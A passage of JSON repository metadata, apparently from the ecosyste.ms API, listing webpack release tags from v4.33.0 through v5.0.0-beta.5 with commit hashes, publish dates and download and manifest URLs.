eleases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T0